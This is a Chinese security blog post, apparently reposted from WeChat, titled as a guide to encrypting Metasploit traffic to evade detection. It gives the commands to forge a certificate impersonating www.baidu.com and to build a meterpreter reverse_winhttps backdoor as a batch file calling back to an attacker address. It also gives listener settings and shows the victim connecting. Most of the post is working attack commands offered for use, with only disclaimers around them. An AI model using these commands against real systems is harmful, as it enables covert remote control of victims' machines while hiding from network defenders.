MSF流量加密躲避检测

admin 2024年10月13日21:43:38评论12 views字数 1067阅读3分33秒阅读模式

由于传播、利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

MSF流量加密躲避检测

对于OpenSSL不了解的,可以去看下我上一篇文章

https://mp.weixin.qq.com/s/2ja07gCboEVU0D18BQIa0g

使用OpenSSL加密

生成证书

这里C=UK;ST=London等可以对应下面的HTTPS证书看就明白是什么意思了

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com"
-keyout www.baidu.com.key
-out www.baidu.com.crt &&
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem &&
rm -f www.baidu.com.key www.baidu.com.crt

MSF流量加密躲避检测

MSF生成后门

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.152.130 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o msf_winhttps.bat

MSF流量加密躲避检测

设置监听器

配置监听器时,要用到两个附加选项,目的是告诉处理程序它将使用的证书(与有效负载相同),并在接收到连接时执行SSL证书的验证

HandlerSSLCert

StageVerifySSLCert

set payload windows/meterpreter/reverse_winhttps
set lhost 192.168.152.130
set lport 443
set HandlerSSLCert /root/www.baidu.com.pem(不能中文路径)
set StageVerifySSLCert true

MSF流量加密躲避检测

开启监听后,可以去看看是否开启了https

可以看到此处已经开启了https,并且也可以查看证书

MSF流量加密躲避检测

查看证书

MSF流量加密躲避检测

目标机运行msf_winhttps.bat,成功上线

MSF流量加密躲避检测

MSF流量加密躲避检测

验证是否加密

打开wireshark查看,TLSv1.2,成功加密

MSF流量加密躲避检测

原文始发于微信公众号(Nurburgring):MSF流量加密躲避检测

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日21:43:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSF流量加密躲避检测https://cn-sec.com/archives/872916.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息